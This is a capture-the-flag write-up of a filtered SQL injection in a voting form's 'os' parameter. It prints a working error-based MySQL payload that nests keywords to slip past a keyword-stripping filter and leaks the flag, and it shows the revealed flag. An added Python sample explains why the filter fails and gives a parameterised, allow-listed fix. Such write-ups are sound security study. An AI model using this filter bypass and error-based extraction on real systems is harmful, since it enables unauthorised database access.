This task was a filtered SQL injection in the voting system. The vulnerable parameter was ‘os’. The filter removed strings such as ‘union’, ‘select’, ‘from’, ‘or’, etc. from our payload, and in general all the keywords used in SQL. To bypass it, simply submit something like ‘selSELECTect’: once the filter removes the inner keyword, we have our select in the query. Since we aren’t in a select query we can’t use union, but MySQL error messages are returned, so we can use an error-based query.

Payload:

os=Linux'AANDND polygon((selfromect*frfromom(selfromect*frfromom(selselectect flag frfromom tbl_flag)f)x))---&submit=Submit

Response:

Illegal non geometric '(select `x`.`flag` from (select 'ASIS_1dc337d61dac5cb910eb5b8c17c52fef' AS `flag` from dual) `x`)' value found during parsing
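
Why the keyword-stripping filter fails and what replaces it, as an added example (not code from the challenge or from this write-up). The keyword list and its order, the votes table and the allow-list are assumptions, and sqlite3 stands in for MySQL.

```python
import re
import sqlite3

# Assumed reconstruction of the filter: each keyword is deleted in a single
# pass, in list order, case-insensitively. List and order are assumptions.
BLOCKED = ["union", "select", "from", "and", "or"]


def strip_keywords(value):
    """Blacklist filter: deleting a keyword can splice a new one together."""
    for kw in BLOCKED:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value


# Constructed allow-list: the only values the vote form legitimately sends.
ALLOWED_OS = {"Linux", "Windows", "Mac"}


def make_db():
    """In-memory stand-in for the voting table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE votes (os TEXT PRIMARY KEY, n INTEGER)")
    conn.executemany("INSERT INTO votes VALUES (?, 0)",
                     [(name,) for name in sorted(ALLOWED_OS)])
    return conn


def record_vote(conn, os_name):
    """Hardened path: reject unknown values, then bind the value as data."""
    if os_name not in ALLOWED_OS:
        raise ValueError("unknown os value")
    conn.execute("UPDATE votes SET n = n + 1 WHERE os = ?", (os_name,))
    row = conn.execute("SELECT n FROM votes WHERE os = ?", (os_name,)).fetchone()
    return row[0]


if __name__ == "__main__":
    # Tokens taken from the write-up; the filter output is a working keyword.
    for token in ["selSELECTect", "selfromect", "frfromom", "AANDND"]:
        print(token, "->", strip_keywords(token))
    # The same filter also damages a legitimate value.
    print("Android ->", strip_keywords("Android"))
    print("votes for Linux:", record_vote(make_db(), "Linux"))
```

With the value bound as a parameter, nothing in it is parsed as SQL, so no keyword filtering is needed; disabling verbose database errors in responses removes the error-based channel the write-up relies on.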

Razor4x, nurfed